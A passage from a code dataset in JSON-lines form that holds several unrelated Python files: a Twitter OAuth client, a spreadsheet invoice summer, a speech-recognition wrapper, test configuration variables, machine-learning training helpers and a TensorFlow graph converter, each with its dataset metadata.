DNS.DnsRequest(qtype='A')\n\ndef lookup(hostname):\n global resolver\n res = resolver.req(hostname)\n if len(res.answers) == 0:\n return []\n return [ x['data'] for x in res.answers if x['typename'] == 'A' ]","sub_path":"pycfiles/dnsmon-0.1-py2.6/resolver.py","file_name":"resolver.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"432570503","text":"# %%\r\nimport pandas as pd\r\nbcf = pd.read_excel(r'G:\\工作备份\\招联文件\\安鲜达对账\\三方-百富勤食品专营店_201909_对账单-20191018120856.xlsx',\r\n sheet_name='包材辅料费',index_col='订单流水号', usecols=['订单流水号', '包材辅料总费用'])\r\npsf = pd.read_excel(r'G:\\工作备份\\招联文件\\安鲜达对账\\三方-百富勤食品专营店_201909_对账单-20191018120856.xlsx',\r\n sheet_name='配送费', index_col='订单流水号', usecols=['订单流水号', \"配送费用\",'客户订单号'])\r\nddf = pd.read_excel(r'G:\\工作备份\\招联文件\\安鲜达对账\\三方-百富勤食品专营店_201909_对账单-20191018120856.xlsx',\r\n sheet_name='订单操作费', index_col='订单流水号', usecols=['订单流水号', '订单操作费'])\r\nTable = bcf.join(ddf, how='left').join(psf)\r\nColumn_sum = Table.sum(axis=1)\r\nTable.insert(4,'合计',Column_sum)\r\n#order = ['客户订单号', '包材辅料总费用', '订单操作费', '配送费用', '合计']\r\nTable = Table[['客户订单号', '包材辅料总费用', '订单操作费', '配送费用', '合计']]\r\ncol=list(Table)\r\nprint(col)\r\n#print(Table.head())\r\nTable.to_excel(r'g:\\sum.xlsx')\r\n\r\n\r\n# %%\r\n","sub_path":"安鲜达快递账单.py","file_name":"安鲜达快递账单.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"225829417","text":"# import util\nimport webapp2\nimport tweepy\nimport secret\nfrom main import BaseHandler\nfrom google.appengine.ext import ndb\nfrom webapp2_extras import routes\n\n# callback_url = 'http://dev.box.dinoia.eu/twitter/'\nauth = tweepy.OAuthHandler(secret.consumer_token,\n secret.consumer_secret)\n\n\nclass Twittero(ndb.Model):\n screen_name = ndb.StringProperty()\n email = ndb.StringProperty()\n access_k = ndb.StringProperty()\n access_s = ndb.StringProperty()\n last_id = ndb.StringProperty()\n data = ndb.DateTimeProperty(auto_now=True)\n\n def followers_ids(self):\n followers = Followers.query(Followers.ui == self.key).fetch()\n return [follower.user_id for follower in followers]\n\n def new_foll(self):\n return Followers.query(Followers.ui == self.key,\n Followers.new == True)\n\n def lost_foll(self):\n return Followers.query(Followers.ui == self.key,\n Followers.lost == True)\n\n\nclass Followers(ndb.Model):\n ui = ndb.KeyProperty(kind=Twittero)\n user_id = ndb.IntegerProperty()\n screen_name = ndb.StringProperty()\n data = ndb.DateTimeProperty(auto_now=True)\n new = ndb.BooleanProperty(default=False)\n lost = ndb.BooleanProperty(default=False)\n\n\nclass TwitterPage(BaseHandler):\n def get(self):\n oauth_verifier = self.request.get(\"oauth_verifier\")\n screen_name = self.request.cookies.get('screen_name')\n if oauth_verifier:\n auth.get_access_token(oauth_verifier)\n api = tweepy.API(auth)\n screen_name = api.me().screen_name\n old_ui = Twittero.query(Twittero.screen_name == screen_name)\n if old_ui.get():\n ui = old_ui.get()\n else:\n ui = Twittero()\n ui.screen_name = screen_name\n ui.access_k = auth.access_token.key\n ui.access_s = auth.access_token.secret\n ui.put()\n self.response.set_cookie('screen_name', screen_name)\n self.redirect('/twitter/')\n elif screen_name is not None:\n ui = Twittero.query(Twittero.screen_name == screen_name).get()\n auth.set_access_token(ui.access_k, ui.access_s)\n api = tweepy.API(auth)\n new_tweets = api.home_timeline()\n ntw_ids = [tw.id_str for tw in new_tweets]\n tw_ids = []\n n = 0\n while ntw_ids[n] != ui.last_id and n < (len(ntw_ids) - 1):\n tw_ids.append(ntw_ids[n])\n n += 1\n tweets = [api.get_status(tw_id) for tw_id in tw_ids]\n ui.last_id = new_tweets[0].id_str\n ui.put()\n # template = util.jinja_environment.get_template('twitter.html')\n # self.response.write(template.render({'tweets': tweets, 'ui': ui}))\n self.generate('twitter.html', {'tweets': tweets, 'ui': ui})\n else:\n redirect_url = auth.get_authorization_url()\n # template = util.jinja_environment.get_template('twitter.html')\n # self.response.write(template.render({'redirect_url': redirect_url}))\n self.generate('twitter.html', {'redirect_url': redirect_url})\n\n\nclass Retweet(webapp2.RequestHandler):\n def get(self):\n screen_name = self.request.cookies.get('screen_name')\n ui = Twittero.query(Twittero.screen_name == screen_name).get()\n auth.set_access_token(ui.access_k, ui.access_s)\n api = tweepy.API(auth)\n id_str = self.request.get('id_str')\n api.retweet(id_str)\n\n\nclass Tweet(webapp2.RequestHandler):\n def get(self):\n screen_name = self.request.cookies.get('screen_name')\n ui = Twittero.query(Twittero.screen_name == screen_name).get()\n auth.set_access_token(ui.access_k, ui.access_s)\n api = tweepy.API(auth)\n text = self.request.get('text_tweet')\n api.update_status(text)\n self.redirect(self.request.referer)\n\n\nclass check(webapp2.RequestHandler):\n def get(self):\n screen_name = self.request.cookies.get('screen_name')\n ui = Twittero.query(Twittero.screen_name == screen_name).get()\n ndb.delete_multi([f.key for f in ui.lost_foll()])\n auth.set_access_token(ui.access_k, ui.access_s)\n api = tweepy.API(auth)\n old_list = ui.followers_ids()\n new_list = api.followers_ids()\n put_queue = []\n new_foll = [nf for nf in new_list if nf not in old_list]\n for nf in new_foll:\n f = Followers(ui=ui.key,\n user_id=nf,\n screen_name=api.get_user(nf).screen_name,\n new=True)\n put_queue.append(f)\n for lf in old_list:\n if lf not in new_list:\n exfollower = Followers.query(Followers.user_id == lf).get()\n exfollower.lost = True\n put_queue.append(exfollower)\n for sf in old_list:\n if sf in new_list:\n follower = Followers.query(Followers.user_id == sf).get()\n if follower.new is True:\n follower.new = False\n put_queue.append(follower)\n ndb.put_multi(put_queue)\n self.redirect('/twitter/')\n\napp = webapp2.WSGIApplication([\n routes.RedirectRoute('/twitter/', TwitterPage, name='Twitter', strict_slash=True),\n routes.PathPrefixRoute('/twitter', [\n webapp2.Route('/check', check),\n webapp2.Route('/retweet', Retweet),\n webapp2.Route('/tweet', Tweet),\n ]), ])\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"app/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"548551051","text":"class Solution:\n def findPeakElement(self, nums: List[int]) -> int:\n if len(nums)==1:\n return 0\n x=len(nums)\n for i in range(1,x-1):\n if nums[i]>nums[i-1] and nums[i]>nums[i+1]:\n return i\n if nums[0]>nums[-1]:\n return 0\n else:\n return x-1\n","sub_path":"Sort and Search/寻找峰值.py","file_name":"寻找峰值.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"511280276","text":"shop = {}\n\nwith open('./lenmen.txt', encoding='utf-8') as f:\n for line in f:\n linesplit = line.split('|')[-1].strip(' ').strip('\\n')\n allctry = linesplit.split('/')\n for ctr in allctry:\n ctrr = ctr.strip(' ')\n if ctrr == '':\n ctrr = '日本'\n if ctrr == 'USA' or '59' in ctrr or 'b07' in ctrr:\n ctrr = '美国'\n if 'www' in ctrr:\n ctrr = '英国'\n if 'http' in ctrr or '.' in ctrr or '-' in ctrr or 'prog' in ctrr or 'endeavour' in ctrr:\n ctrr = '法国'\n try:\n shop[ctrr] += 1;\n except Exception as ex:\n shop[ctrr] = 0\n shop[ctrr] += 1\n # if not shop[ctr]:\n # shop[ctr] = 0\n # shop[ctr] += 1\n\nprint(shop.keys())\n\ndataarr = []\nfor ctr in shop:\n dataarr.append({\"value\": shop[ctr], \"name\": ctr})\nprint(dataarr)\n\n","sub_path":"learning-group/douban/douban3.py","file_name":"douban3.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"244426613","text":"'''\nCreated on Aug 24, 2012\n\n@author: nyga\n'''\nimport json\nimport urllib.error\nimport urllib.parse\nimport urllib.request\nfrom subprocess import Popen, PIPE\n\n\nclass Voice(object):\n '''\n Implements an interface to the Google Speech Recognition API.\n Provides methods for recording speech from a microphone\n and sending it to the Google API.\n '''\n \n def __init__(self, name):\n self.arecord = None\n self.url = \"https://www.google.com/speech-api/v1/recognize?xjerr=1&client=chromium&lang=en-US\"\n# self.url = \"https://www.google.com/speech-api/v1/recognize?xjerr=1&client=chromium&lang=de-DE\"\n self.header = {'Content-Type' : 'audio/x-flac; rate=16000'}\n self.wavFile = None\n self.wavName = None\n self.name = name\n \n def startRecording(self, duration=None):\n '''\n Initializes a recording process. Reqiures the 'arecord' programm installed.\n If the duration parameter is set, this method will block until the given \n time of recording is up.\n '''\n self.wavName = '/tmp/wavFile_{}.wav'.format(self.name)\n self.wavFile = open(self.wavName, 'w+')\n cmdLine = ['/usr/bin/arecord']\n cmdLine.extend(['-f', 'S16_LE'])\n cmdLine.extend(['-t', 'wav'])\n cmdLine.extend(['-c', '1'])\n cmdLine.extend(['-r', '16000'])\n if duration != None:\n cmdLine.extend(['-d', str(duration)])\n self.arecord = Popen(cmdLine, stdout=self.wavFile, stderr=PIPE)\n if duration:\n self.arecord.wait()\n \n def stopRecording(self):\n '''\n Stops recording.\n '''\n if self.arecord != None:\n self.arecord.terminate()\n self.arecord = None\n if self.wavFile != None:\n self.wavFile.close()\n self.wavFile = None\n \n def analyze(self):\n '''\n Converts the recorded file to the .flac format\n and sends it to Google. Result is a JSON string\n with the hypotheses of written text.\n '''\n if self.wavName is None:\n return \"\"\n flacName = 'flacFile.flac'\n cmdLine = ['/usr/bin/ffmpeg']\n cmdLine.extend(['-i', self.wavName])\n cmdLine.extend(['-y'])\n cmdLine.extend([flacName])\n ffmpeg = Popen(cmdLine, stderr=PIPE)\n ffmpeg.wait()\n flacData = open(flacName, 'r').read()\n header = {'Content-Type' : 'audio/x-flac; rate=16000'}\n req = urllib.request.Request(self.url, flacData, header)\n answer = urllib.request.urlopen(req)\n self.wavName = None\n jsonResult = json.loads(answer.read())\n sentence = jsonResult.get('hypothesis', None)\n if sentence == '':\n sentence = None\n return sentence","sub_path":"python3/prac/googlevoice/recognize.py","file_name":"recognize.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"343087541","text":"import pytest\nimport tango\nfrom ska_control_model import HealthState\nfrom tango.test_utils import DeviceTestContext\n\nfrom ska_tmc_sdpmasterleafnode.sdp_master_leaf_node import SdpMasterLeafNode\n\n\n@pytest.fixture\ndef sdpmln_device(request):\n \"\"\"Create DeviceProxy for tests\"\"\"\n true_context = request.config.getoption(\"--true-context\")\n if not true_context:\n with DeviceTestContext(SdpMasterLeafNode, process=True) as proxy:\n yield proxy\n else:\n database = tango.Database()\n instance_list = database.get_device_exported_for_class(\n \"SdpMasterLeafNode\"\n )\n for instance in instance_list.value_string:\n yield tango.DeviceProxy(instance)\n break\n\n\ndef test_attributes(sdpmln_device):\n assert sdpmln_device.healthState == HealthState.OK\n","sub_path":"tests/ska_tmc_sdpmasterleafnode/unit/test_sdpmln_healthstate.py","file_name":"test_sdpmln_healthstate.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"378523898","text":"\"\"\"\nUSER DEFINED VARIABLES\n\"\"\"\n\n# INTERCONNECT NAMES FOR TOGGLE_UPLINK,TOGGLE_DOWNLINK\nICM_NAMES = ['ENC47_CN75450498, interconnect 3', 'ENC48_CN7545049J, interconnect 6']\n\n# DOWNLINK_PORT_NAME FOR TOGGLE_DOWNLINK\nDOWNLINK_PORT_NAME = ['d2', 'd2']\n\n# UPLINK_PORT_NAME FOR TOGGLE_UPLINK\nUPLINK_PORT_NAME = ['Q2', 'Q2']\n\n# LE NAME FOR REAPPLY_LE & TO GET LI NAME\nLE = ['LE']\n\n# LI NAME FOR LI-REAPPLY\nLI = ['LE-LIG-2ME']\n\n# UPLINK SET TO BE DELETED IN LI FOR UFG SCENARIO\nDELETE_UPLINKSET_NAME = ['Tunnel']\n\n# SERVER_PROFILE FOR SERVER ONLINE,OFFLINE EDIT\n# First column: Server Profiles. Second column: Enclosure, bay #\nSERVER_PROFILE_ONLINE_OFFLINE_EDIT = {'E47-Bay1-1': 'ENC47_CN75450498, bay 1',\n 'E47-Bay2-2': 'ENC47_CN75450498, bay 2'\n }\n\n# REQUESTED MBPS TO BE EDITED - FOR SERVER OFFLINE EDIT\nREQUESTEDMBPS = '1500'\n\n# CONNECTION DELETE FOR SERVER OFFLINE EDIT\n# EXCEPTION - PXE CONNECTION DELETE ###PXE SECONDARY ID SHOULD BE DELETED BEFORE PXE PRIMARY ID###\n# EXCEPTION - FC CONNECTION DELETE ###FC SECONDARY ID SHOULD BE DELETED BEFORE FC PRIMARY ID###\nCONNECTION_ID = '2'\n\n# server_profile_to_bay_map - FOR POWEROFF SERVER,POWERON SERVER,ASSIGN,UNASSIGN SERVERS\n# First column: Server Profiles. Second column: Enclosure, bay #\nSERVER_PROFILE_TO_BAY_MAP = {\n 'E47-Bay1-1': 'None',\n 'E47-Bay2-2': 'None',\n 'E47-Bay3-3': 'ENC47_CN75450498, bay 3',\n 'E47-Bay4-4': 'None',\n 'E47-Bay5-5': 'None',\n 'E47-Bay6-6': 'None',\n 'E47-Bay7-7': 'None',\n 'E47-Bay8-8': 'None',\n 'E47-Bay9-9': 'ENC47_CN75450498, bay 9',\n 'E47-Bay10-10': 'None',\n 'E47-Bay11-11': 'None',\n 'E47-Bay12-12': 'None',\n 'E48-Bay1-13': 'None',\n 'E48-Bay2-14': 'None',\n 'E48-Bay3-15': 'None',\n 'E48-Bay4-16': 'None',\n 'E48-Bay5-17': 'None',\n 'E48-Bay6-18': 'None',\n 'E48-Bay7-19': 'None',\n 'E48-Bay8-20': 'None',\n 'E48-Bay9-21': 'None',\n 'E48-Bay10-22': 'None',\n 'E48-Bay11-23': 'None',\n 'E48-Bay12-24': 'None',\n}\n\n# support-dump-interval\nLE_SUPPORT_DUMP_SLEEP = '50m'\nOV_SUPPORT_DUMP_SLEEP = '15m'\n\n# Appliance-Backup-Restore\nPOST_RESTORE_SLEEP = '50m'\nBACKUP_DOWNLOAD_SLEEP = '5m'\nUPLOAD_BACKUP_WAIT_TIME = '5m'\nUPLOAD_BACKUP_WAIT_INTERVAL = '5s'\n\n# server power on sleep\nSERVER_POWERON_SLEEP = '15m'\n\n# server hardware assign timeout\nSERVER_HW_ASSIGN_WAIT_TIME = '240m'\nSERVER_HW_ASSIGN_INTERVAL = '3s'\n\nUPDATE_FROM_GROUP_WAIT_TIME = '90m'\nUPDATE_FROM_GROUP_WAIT_INTERVAL = '5s'\n\n# Wait for task sleep\nWAIT_FOR_TASK_WAIT_TIME = '30m'\nWAIT_FOR_TASK_INTERVAL = '5s'\n\n# TOGGLE-IC-PORT\nTOGGLE_INTERCONNECT_PORT_SLEEP = '3m'\n\n# Server unaasign reassign sleep post restoration\nSERVER_UNASSIGN_REASSIGN_SLEEP = '25m'\n\n# -----------------\n# Below variables are a copy of robustness data variable file. If we need to use only one data variable file for test cases, its advisable to copy the above variables to configs robustnees data variable file\n# -----------------\n\n\"\"\"\nDEFAULT VARIABLES\n\"\"\"\n\n# REQUEST BODY FOR LE SUPPORT DUMP\n# errorCode - This string is a mandatory one to generate LE support dump and it is a part of support-dump file name,\n# excludeApplianceDump - Boolean value that determines whether the appliance support dump content is excluded from the logical enclosure support dump. This attribute defaults to false if not included\n# encrypt - Boolean value indicating if support dump needs to be encrypted or not\nLE_SUPPORTDUMP_PAYLOAD = {\"encrypt\": False, \"errorCode\": \"MyDump16\", \"excludeApplianceDump\": False}\n\n# REQUEST BODY FOR OV SUPPORT DUMP\n# errorCode - This error code is a mandatory one and it is a part of support-dump file name, such as CI1234 or CI892a2\n# encrypt - Boolean value indicating if support dump needs to be encrypted or not\nSUPPORT_DUMP = {\n \"errorCode\": \"CI\",\n \"encrypt\": False\n}\n\n# ICM scripts directory and get ICM password script\nICM_SCRIPTS_DIR = '/root/ci-fit/4.10_OVEDITS/fusion/tests/wpst_crm/ci_fit/tools/interconnect/scripts'\nICM_PASSWD_SCRIPT = 'get-icm-passwd.sh'\n\n# USE_HAFNIUM_RESOURCE_IPV4 = \n# True: IPv4 address of Master Potash from resource data and use it.\n# False: Get the IPv6 link local address from canmic block\n# through OneView and use it.\n# : This recommended if your TCS has SSH access to Master Potash\n# using IPv6 link local.\nUSE_HAFNIUM_RESOURCE_IPV4 = True\n\n# DISABLE_BONDING_MULTI_TEST: Perform multiple bonding interface checks which varies depending on the bonding mode.\n# NOTE: This is by default set to False. Thus, to disable this test set this variable to True (Not recommented)\n# DISABLE_BONDING_MULTI_TEST = False\n# REMOTE_RUN_CHECKS: List of dictionary data of other hosts/ips that you want to trigger server checks (bonding, network, etc).\n# REMOTE_RUN_CHECKS = [\n# { 'host': '15.186.13.8', 'username': 'root', 'password': 'rootpwd', 'command': {'logDir': 'remote_check_server', 'script': 'Check-Server.robot', 'scriptLocation': '/tmp/jasonp/fusion_420/tests/wpst_crm/ci_fit/tests/robustness/tools', 'haFile': '/tmp/jasonp/CISCO_HA_FILE-multi_tcs_compliant.conf', 'dataFile': '/tmp/jasonp/fusion_420/tests/wpst_crm/ci_fit/tests/robustness/resources/synergy_robustness_data_variables_template.py'}},\n# ]\n\n# NO_CHECK_BONDS: List of profiles you don't want to perform check bonds.\n# Default (empty list): []\n# Example workflow: 2 profiles will be excluded from check bonds\n# NO_CHECK_BONDS = [\n# 'CI-FIT-I8-Eagle35-Bay1',\n# 'CI-FIT-I8-Eagle35-Bay2',\n# 'CI-FIT-I8-Eagle35-Bay3',\n# 'CI-FIT-I8-Eagle35-Bay4',\n# 'CI-FIT-I8-Eagle35-Bay5',\n# 'CI-FIT-I8-Eagle35-Bay6',\n# 'CI-FIT-I8-Eagle49-Bay1',\n# 'CI-FIT-I8-Eagle49-Bay2',\n# 'CI-FIT-I8-Eagle49-Bay3',\n# 'CI-FIT-I8-Eagle49-Bay4',\n# 'CI-FIT-I8-Eagle49-Bay5',\n# 'CI-FIT-I8-Eagle49-Bay6',\n# 'CI-FIT-I8-Eagle49-Bay7',\n# 'CI-FIT-I8-Eagle49-Bay8',\n# 'CI-FIT-I8-Eagle49-Bay9',\n# 'CI-FIT-I8-Eagle49-Bay10',\n# 'CI-FIT-I8-Eagle49-Bay11',\n# 'CI-FIT-I8-Eagle49-Bay12'\n# ]\n","sub_path":"robo4.2/fusion/tests/wpst_crm/ci_fit/tests/robustness/resources/ov_edits_data_variables_template.py","file_name":"ov_edits_data_variables_template.py","file_ext":"py","file_size_in_byte":6023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"258158376","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))\n\nfrom X.Tar import *\n\n\nif __name__ == '__main__':\n\tprint(dir(LS))\n\n\tx = TK(sys.argv[1])\n\tprint(\n\t\tx.__dict__,\n\t\tx.projects()\n\t)\n\n\ttmp = D.temp()\n\tx.t(D([tmp, 't']))\n","sub_path":"Python/_QA/Tar/TK.py","file_name":"TK.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"534038244","text":"#! /usr/bin/python\n\n# Copyright (c) 2019 Filippo Ranza \n\nfrom yaml import safe_load\n\n\nDEFAULT_CONF = {\n \"TIME_LIMIT\": -1,\n \"NUM_THREAD\": -1,\n \"MIP_GAP\": 0.0,\n \"KERNEL\": \"base\",\n \"KERNEL_CONF\": {},\n \"BUCKET\": \"fixed\",\n \"BUCKET_CONF\": {\"size\": 10},\n \"PRELOAD\": True,\n \"LOG\": False,\n \"DEBUG\": '',\n \"KERNEL_SORTER\": \"base_kernel_sort\",\n \"KERNEL_SORTER_CONF\": {},\n \"BUCKET_SORTER\": \"base_bucket_sort\",\n \"BUCKET_SORTER_CONF\": {},\n \"ITERATIONS\": 1,\n}\n\n\ndef check_config(conf):\n for k, v in DEFAULT_CONF.items():\n c = conf[k]\n if not (type(c) is type(v)):\n raise ValueError(\n f\"Configuration Error: {k} should be an {type(v)} found {type(c)} instead\"\n )\n\n\ndef load_config(file_name):\n \"\"\"\n Load the configuration from the given file.\n\n Parameters\n ----------\n file_name : str\n path to the YAML configuration file\n\n Raises\n ------\n ValueError\n if some variable in the given configuration \n does not have the same type of the variables \n in the default configuration. Other variables \n are not checked.\n \n Returns\n -------\n config: dict\n map configuration variable name into \n their values\n \"\"\"\n if not file_name:\n return DEFAULT_CONF\n\n with open(file_name) as file:\n conf = safe_load(file)\n\n out = {**DEFAULT_CONF, **conf}\n check_config(out)\n return out\n","sub_path":"ks_engine/config_loader.py","file_name":"config_loader.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"160996713","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/dez/samples/wsgi_test.py\n# Compiled at: 2015-11-19 18:49:54\nfrom dez.http.application import HTTPApplication\n\ndef simple_app(environ, start_response):\n \"\"\"Simplest possible application object\"\"\"\n status = '200 OK'\n response_headers = [('Content-type', 'text/plain')]\n start_response(status, response_headers)\n return ['Hello world!\\n']\n\n\ndef main(**kwargs):\n httpd = HTTPApplication(kwargs['domain'], kwargs['port'])\n httpd.add_wsgi_rule('/', simple_app)\n httpd.start()","sub_path":"pycfiles/dez-0.10.9.32-py2.7/wsgi_test.py","file_name":"wsgi_test.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"194397079","text":"import re\r\n\r\nfrom pymongo import MongoClient\r\nimport db_conf\r\n\r\n\r\ndef conlletion(collectionName):\r\n conn = MongoClient(host=db_conf.db_ip, port=db_conf.db_port)\r\n # 创建数据库\r\n db = conn[db_conf.Db_name]\r\n con = db[collectionName]\r\n return con\r\n\r\n\r\ncomment_coll = conlletion(db_conf.Comment_coll)\r\niniturl_coll = conlletion(db_conf.IndexUrl_coll)\r\n\r\nf = {\"$and\": [\r\n {'subscribers': {'$gte': 0, '$lte': 40000}},\r\n {'_id': 'd68185621820f57757f563095d80429f'}\r\n ]}\r\n# f = {\"$and\":[{\"_id\":\"2cd1a69ae3bf881b2cc03723b8a914ac\"},{'country': 'India1'}]}\r\nfield = {\"_id\", \"author\", \"subscribers\", \"country\", \"email\", \"keyWord\", \"isSend\", \"url\"}\r\ncurrs = comment_coll.find(f, field)\r\nfor i in currs:\r\n print(i)\r\n\r\nt = \"\"\r\nkey = t.split(\",\")\r\nprint(key)","sub_path":"youtube_site/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"599343929","text":"\"\"\"Helper function for high-throughput GNN trainings.\"\"\"\nimport matplotlib.pyplot as plt\n\n# import numpy as np\nimport time\nfrom alignn.train import train_dgl\n\n# from sklearn.metrics import mean_absolute_error\nplt.switch_backend(\"agg\")\n\n\ndef train_prop_model(\n prop=\"\",\n dataset=\"dft_3d\",\n write_predictions=True,\n name=\"alignn\",\n save_dataloader=False,\n train_ratio=None,\n classification_threshold=None,\n val_ratio=None,\n test_ratio=None,\n learning_rate=0.001,\n batch_size=None,\n scheduler=None,\n n_epochs=None,\n id_tag=None,\n num_workers=None,\n):\n \"\"\"Train models for a dataset and a property.\"\"\"\n if scheduler is None:\n scheduler = \"onecycle\"\n if batch_size is None:\n batch_size = 64\n if n_epochs is None:\n n_epochs = 300\n if num_workers is None:\n num_workers = 0\n config = {\n \"dataset\": dataset,\n \"target\": prop,\n \"epochs\": n_epochs, # 00,#00,\n \"batch_size\": batch_size, # 0,\n \"weight_decay\": 1e-05,\n \"learning_rate\": learning_rate,\n \"criterion\": \"mse\",\n \"optimizer\": \"adamw\",\n \"scheduler\": scheduler,\n \"save_dataloader\": save_dataloader,\n \"pin_memory\": False,\n \"write_predictions\": write_predictions,\n \"num_workers\": num_workers,\n \"classification_threshold\": classification_threshold,\n \"model\": {\n \"name\": name,\n },\n }\n if id_tag is not None:\n config[\"id_tag\"] = id_tag\n if train_ratio is not None:\n config[\"train_ratio\"] = train_ratio\n if val_ratio is None:\n raise ValueError(\"Enter val_ratio.\")\n\n if test_ratio is None:\n raise ValueError(\"Enter test_ratio.\")\n config[\"val_ratio\"] = val_ratio\n config[\"test_ratio\"] = test_ratio\n if dataset == \"jv_3d\":\n # config[\"save_dataloader\"]=True\n config[\"num_workers\"] = 4\n config[\"pin_memory\"] = False\n # config[\"learning_rate\"] = 0.001\n # config[\"epochs\"] = 300\n\n if dataset == \"mp_3d_2020\":\n config[\"id_tag\"] = \"id\"\n config[\"num_workers\"] = 0\n if dataset == \"megnet2\":\n config[\"id_tag\"] = \"id\"\n config[\"num_workers\"] = 0\n if dataset == \"megnet\":\n config[\"id_tag\"] = \"id\"\n if prop == \"e_form\" or prop == \"gap pbe\":\n config[\"n_train\"] = 60000\n config[\"n_val\"] = 5000\n config[\"n_test\"] = 4239\n # config[\"learning_rate\"] = 0.01\n # config[\"epochs\"] = 300\n config[\"num_workers\"] = 4\n if dataset == \"oqmd_3d_no_cfid\":\n config[\"id_tag\"] = \"_oqmd_entry_id\"\n config[\"num_workers\"] = 0\n if dataset == \"edos_pdos\":\n if prop == \"edos_up\":\n config[\"model\"][\"output_features\"] = 300\n elif prop == \"pdos_elast\":\n config[\"model\"][\"output_features\"] = 200\n else:\n raise ValueError(\"Target not available.\")\n if dataset == \"qm9_std_jctc\":\n config[\"id_tag\"] = \"id\"\n config[\"n_train\"] = 110000\n config[\"n_val\"] = 10000\n config[\"n_test\"] = 10829\n\n # config[\"batch_size\"] = 64\n config[\"cutoff\"] = 5.0\n config[\"standard_scalar_and_pca\"] = False\n\n if dataset == \"qm9_dgl\":\n config[\"id_tag\"] = \"id\"\n config[\"n_train\"] = 110000\n config[\"n_val\"] = 10000\n config[\"n_test\"] = 10831\n config[\"standard_scalar_and_pca\"] = False\n config[\"batch_size\"] = 64\n config[\"cutoff\"] = 5.0\n if config[\"target\"] == \"all\":\n config[\"model\"][\"output_features\"] = 12\n\n # config[\"max_neighbors\"] = 9\n\n if dataset == \"hpov\":\n config[\"id_tag\"] = \"id\"\n if dataset == \"qm9\":\n config[\"id_tag\"] = \"id\"\n config[\"n_train\"] = 110000\n config[\"n_val\"] = 10000\n config[\"n_test\"] = 13885\n config[\"batch_size\"] = batch_size\n config[\"cutoff\"] = 5.0\n config[\"max_neighbors\"] = 9\n # config['atom_features']='atomic_number'\n if prop in [\"homo\", \"lumo\", \"gap\", \"zpve\", \"U0\", \"U\", \"H\", \"G\"]:\n config[\"target_multiplication_factor\"] = 27.211386024367243\n t1 = time.time()\n result = train_dgl(config)\n t2 = time.time()\n print(\"train=\", result[\"train\"])\n print(\"validation=\", result[\"validation\"])\n print(\"Toal time:\", t2 - t1)\n print()\n print()\n print()\n","sub_path":"alignn/train_props.py","file_name":"train_props.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503461497","text":"\nimport tensorflow as tf\nfrom google.protobuf import text_format\nfrom tensorflow.python.platform import gfile\n\ndef pbtxt_to_graphdef(filename):\n with open(filename, 'r') as f:\n graph_def = tf.GraphDef()\n file_content = f.read()\n text_format.Merge(file_content, graph_def)\n tf.import_graph_def(graph_def, name='')\n tf.train.write_graph(graph_def, 'pbtxt/', 'protobuf.pb', as_text=False)\n\ndef graphdef_to_pbtxt(filename): \n with gfile.FastGFile(filename,'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n tf.import_graph_def(graph_def, name='')\n tf.train.write_graph(graph_def, 'pbtxt/', 'protobuf.pbtxt', as_text=True)\n return\n\n #===================================================\nfrom tensorflow.core.protobuf import saved_model_pb2\nfrom tensorflow.python.util import compat\n\ndef graphdef_to_pbtxt22(filename): \n with tf.Session() as sess:\n with gfile.FastGFile(filename,'rb') as f:\n data = compat.as_bytes(f.read())\n sm = saved_model_pb2.SavedModel()\n sm.ParseFromString(data) \n g_in = tf.import_graph_def(sm.meta_graphs[0].graph_def) \n tf.train.write_graph(sess.graph, 'pbtxt/', 'protobuf.pbtxt', as_text=True)\n return\n \n \n# graphdef_to_pbtxt22('saved_model.pb') # here you can write the name of the file to be converted\n# and then a new file will be made in pbtxt directory.\n\ngraphdef_to_pbtxt(\"models/Frozen_model_ssd_train3_10000_step/frozen_inference_graph.pb\")","sub_path":"models/udsim/converter_pb_pbtxt.py","file_name":"converter_pb_pbtxt.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"462108722","text":"#!/usr/bin/env python3\n\n#######################################################################################\n# #\n# Program purpose: Removes duplicates element (leaving just a two) using #\n# O(1) memory algorithm. #\n# Program Author : Happi Yvan #\n# Creation Date : September 14, 2020 #\n# #\n#######################################################################################\n\nfrom typing import List\n\ndef 